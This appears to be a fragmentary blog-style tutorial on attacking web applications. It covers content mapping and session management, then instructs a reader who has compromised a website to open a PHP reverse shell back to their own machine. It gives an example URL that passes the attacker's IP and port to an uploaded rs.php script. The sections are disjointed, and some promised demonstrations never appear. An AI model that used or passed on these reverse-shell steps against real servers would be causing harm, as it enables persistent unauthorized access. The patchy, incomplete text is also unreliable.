Mapping The Application

the first steep in process of attacking the application is gathering and some key information about it to gain a better understanding what are you up against. the mapping exercise begins by enumerating the application content and functionality to understand what the web application does and how it behaves. much of this functionality is easy to identify, but some of it maybe hidden, requiring a degree of guesswork and lucky discover.

• Enumerating Content and Functionality 

In a typical web application, the majority of content and functionality can be identified via manual browsing.

as shown below :

ATTACKING SESSION MANAGEMENT

 The session management mechanism is a fundamental security component in the majority of web applications. It is what enables the applications to uniquely identify a given user across a number of different requests, and to handle data that it accumulates about the state of that user's interaction with the applications. Where an applications implements login functionality, session management is of particular importance, as it what enables the applications to persist its assurance if any given user's identity beyond the requests in which they supply their credential.

Now I'll show you how to attacking session management on a web applications and do some privileges escalation on it.

PHP Reverse Shell On Linux Server

If you are attacking a website and successfully compromised, you have to connect back from the web server machine to your local machine for future Attack. I have one simple php script to do that, only enter your ip address and your port on the URL to connect back. for example :

http://192.168.56.101/rs.php?ip=192.168.56.1&port=1234

At the ip 192.168.56.101 is the target ip, the script called rs.php and then variables ip and port are from your local machine.